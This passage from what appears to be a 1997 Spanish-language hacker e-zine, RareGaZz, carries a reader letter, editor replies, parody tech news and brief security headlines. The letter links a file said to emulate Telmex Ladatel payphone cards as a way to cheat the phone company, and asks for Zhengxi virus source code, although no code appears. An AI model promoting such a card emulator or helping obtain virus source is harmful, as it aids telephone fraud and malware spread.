ESTADO BUSCANDO EL CODIGO EN ENSAMBALDOR DE ESTE VIRUS(A MI ME ENCANTA ANALISAR LOS CODIGOS EN ENSABLADOR), ASI QUE SI SABEN DONDE LO PUEDO CONSEGUIR SE LES AGRADESERIA QUE ME LO HICIERAN SABER. A POR CIERTO EN UNA DE SUS REVISTAS PIDEN ALGO PARA CHINGARSE A TELMEX, PUES AQUI LES VA: http://www.si-mexweb.com/mex-hack/spanish/tprom.zip LA DIRECCION COMO VEN ES DE GILIGAN EL DE MEX-HACK, ESTA ES UNA TARJETA PROM PARA SIMULAR UNA TARJETA LADATEL, SEGUN GILIGAN ESTA MADRE SI FUNCIONA PERO NO LA HE PODIDO PROVAR YA QUE ME FALTA LA MEMORIA RAM QUE NO HE PODIDO ENCONTRAR, PERO EN SI EL DOCUEMTO ESTA MUY INTERESANTE PARA QUE LO ADICIONEN EN ALGUN NUMERO DE SU REVISTA. POR OTRO NO CONOCEN HA NADIE DE POR ACA La tierra del tequila y el mariachi (Gudalajara), QUE SE DEDIQUE AL HACKING, CRACKIN O A LOS VIRUS, PARA FORMAR ALIANSAS POR ACA. YA PARA CABAR, SIGAN COMO VAN Y NO VAYAN A DESAPARECER DE LA RED COMO LES PASA A LOS HACKERS ESPAÑOLES, CHIDO RAZA Y SIGAN DANDO... La informacion es conocimiento y el saber nos hace libres. ATTTEEENNTTAMMENTTE VoV_77 P.D. Aqui les va algo que me encontre por la red. Cliente: "Estoy corriendo Windows 95..." Soporte Tecnico: "Si." Cliente: "Mi computadora no esta funcionando." Soporte Tecnico: "Si, eso ya me lo habia dicho." [ El codigo del virus Zhengxi nosotros tambien lo hemos buscado sin suerte, de hecho ni siquiera hemos podido encontrar el codigo compilado :-( Sabemos que existe por las multiples reseñas que hay en internet sobre el virus pero por el momento el codigo no ha podido ser desensamblado. Sobre hackers en Guadalajara conocemos algunos, si alguien quiere iniciar algo con VoV_77 por esos lares comuniquense con nosotros y se lo haremos saber. ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- [ Quisiera aclarar a todos los lectores que nos tratan de ayudar mandando textos (en ingles) que la mayoria ya los tenemos. No se cual sea su impresion de este e-zine pero nosotros NO somos simples traductores! Ustedes pueden ayudar mas si en lugar de mandarnos textos en ingles para que los incluyeramos en el mag, HICIERAN sus propios textos en español sobre lo que ustedes saben. Eso nos haria sentir mucho mejor que recibir textos en ingles una y otra vez de distintas personas. ¿ Que sucede ? ven a raregazz como una simple maquina traductora? Cada vez que hacen eso nos desilusiona el pasar literalmente horas creando los textos para esta revista. Explicar algo que ustedes sepan para una revista electronica resulta demasiado facil y los alentamos a que lo hagan. Recuerden que no todos saben lo mismo sobre i-net y otros programas como Mirc. No lo tomen a mal, sepan sacar lo constructivo de este mensaje :-) KB ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > NotiLOONS < ~~~~~~~~~ "Noticias para el Interesado" El nuevo Keyboard de Microsoft Microsoft Corporation ha anunciado un nuevo Keyboard diseñado especialmente para Windows. Aparte de las teclas encontradas en el standard keyboard, el nuevo diseño de microsoft incluye varias nuevas teclas que haran tu experiencia en la Pc mas divertida. Las teclas propuestas son: 1) GPF key-- Esta tecla generara inmediatamente un "General Protection Fault" cuando sea presionada. Los representantes de microsoft han explicado que el proposito de esa tecla es el eliminar la fastidiosa tarea de tener que ejecutar un programa para producir un General Protection Fault. 2) $$ key-- Cuando esta tecla sea presionada, el dinero de tu cuenta bancaria sera automaticamente depositado en la cuenta de microsoft sin la necesidad de alguna otra accion o intervencion de terceras personas. 3) MS key-- Esta tecla ejecuta un comercial titulado "Computing for Mindless Drones" en una ventana 1" x 1" 4) Chicago key-- Genera ninguna otra cosa que simples loops por meses... 5) IBM key-- Busca en tu disco sistemas operativos o aplicaciones realizadas por otras compañias que no sean microsoft y las elimina. -|-|--|-|-|-|-|-|-|-|-|-|-|-|-|-|-|--|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| MATTEL ANUNCIA lo mas nuevo en su nueva linea de productos Barbie, la llamada "Hacker Barbie." Estas nuevas muñecas seran sacadas a la venta proximamente. La compañia intenta desterrar los antiguos mitos sobre la mujer como que no saben nada de computadoras, tienen fobia a los numeros y que tienen incapacidades academicas. Esta nueva linea de muñecas Barbie viene equipada con su propia terminal y documentacion UNIX asi como toda la serie arco-iris. El vestuario de la Barbie consiste en una camisa de botones sucia y un par de jeans bastante usados. Los accesorios incluyen un reloj CASIO y lentes tan gruesos que podrian hacer fuego en las hormigas. (Protectores de bolsillo y calculadoras HP opcionales.) La nueva Barbie tiene la increible capacidad de pasarse en la pantalla sin parpadear, comer o beber 16 horas seguidas. Su vocabulario consiste principalmente en "Cual es tu direccion Internet", "Me gusta TCP/IP!", "Tu Kernel esta dañado" y "Viva el CyberSex!". "Estamos muy emocionados con este producto," dice Ken Olsen, Ejecutivo de ventas. La compañia designo como su compañero KEN a un consultante ejecutivo que frecuentemente pide ayuda tecnica a Barbie. Los grupos feministas estan igualmente excitadas por esta nueva linea de muñecas. Los padres -por otra parte- estan preocupados en que caeran detras de los niños cuando la muñeca salga al mercado. "My hija Jenny juega con su muñeca todo el tiempo y dos dias fueron suficientes para que empezara a pagar mis deudas de credito bancarias" Dice Carlson de Oxford, Mississipi "No se como lo hace pero ciertamente lo hace. Lo unico que no quiero es ser vista por mi hija como una madre tonta". Mattel ofrecera cursos de entrenamiento gratuitos a los padres que compren la nueva Hacker Barbie. La futura linea de Hacker Barbie incluira bastantes variaciones para llenar los distintos aspectos de la cultura hacker. "Hacker Barbie va a la Carcel" enseñara las eticas computacionales a los niños, mientras "B4RB13 32CR1B3 421" servira como una introduccion al tipo de escritura. [ Articulo sobre "Hacker Barbie" de Phantasy Mag ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- ** !NOTICIAS SERIAS! ** \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Dragon Systems, un lider en el terreno de software para la recognicion de voz a sacado a la venta su nuevo programa ($299) para reconocer voz continua, con esta tecnologia uno podra hablarle a la computadora sin...tener...que...hacer ...pausas. Jueces federales de EUA han mantenido derrotadas las propuestas contra Internet como la ley de decencia de Nueva York que fue tachada de anti-constitucional y otra ley de Georgia que proponia prohibir la navegacion anonima por la red ha sido tambien derrotada. American Online sufrio el viernes 20 de junio un ataque masivo de email afectando a 500,000....Los hackers explotaron un BUG en el programa de Microsoft "Microsoft Information Server". Un FIX esta disponible. En la primera decision sobre Internet, la suprema corte de justicia a declarado al "Communication Decency Act" como anti-constitucional. 2/julio/1997 - Si has tenido problemas cuando te diriges al website de www.microsoft.com en esta semana, es debido al ataque que esta siendo sometido este sitio por hackers desconocidos hasta la fecha que han estado negando con exito el acceso a ese servidor. Este ataque resulta penoso ya que antier Microsoft anuncio sus nuevos productos "firewall" (barreras de fuego). El servidor de email anonimo HUGE.CAJONES.COM esta fuera de servicio!! Lo que significa que el programa para enviar email anonimo de Raretrip REMAIL.ZIP no sirve por el momento :-( Envia un mensaje a remailer@huge.cajones.com con el subject remailer-help para saber si esta en linea. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ooo $ $ oo Participa en esta revista y forma parte de la " oo " $ gran familia de amigos de raregazz. $ $ $ " "o "o o" $ Todos aquellos que hayan incluido un link a $o $ " " nuestra pagina usando alguno de nuestros logos "$ $ $ $ hagan el favor de enviarnos un logo de su pagina $$ $o " de tamaño maximo 70x70 y maximo 5k. Esto es ooo $ooo o $ para que su link en nuestra pagina se distinga $ "$$o $ $ de los demas. o""o "$ ""o $$ $ $ "$ $ $ $o $o $ " $ Hasta luego y les prometemos que el siguiente $"o $""" o" numero traera aun mejores participaciones y mas $ "" $ consejos y utilidades. raretrip " $ "o $ $ $ """""""" <<::RareGaZz::>>